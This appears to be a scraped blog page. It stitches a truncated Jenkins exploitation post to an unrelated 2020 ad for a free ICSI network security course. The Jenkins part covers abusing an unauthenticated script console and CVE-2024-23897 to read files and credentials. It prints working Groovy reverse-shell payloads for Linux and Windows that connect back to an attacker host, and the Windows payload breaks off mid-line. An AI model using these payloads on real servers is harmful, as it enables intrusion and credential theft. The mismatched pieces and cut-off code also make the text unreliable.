Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
The International Cybersecurity Institute (ICSI) is offering their Certified Network Security Specialist Course for free.Use coupon code #StaySafeHome during checkout to claim your free access.
This course is actually priced at 500GBP and due to COVID-19 lock-down, ICSI is providing the course for free (after applying the coupon code). Labs+Exams are not included as part of this offer but if you wish to do the labs and exam, then you can purchase it for 75GBP. Offer is valid till 31/05/2020. Extended till 30/06/2020
This course is gives an excellent overview on Network security basics and is perfect to those who are new to the network security domain.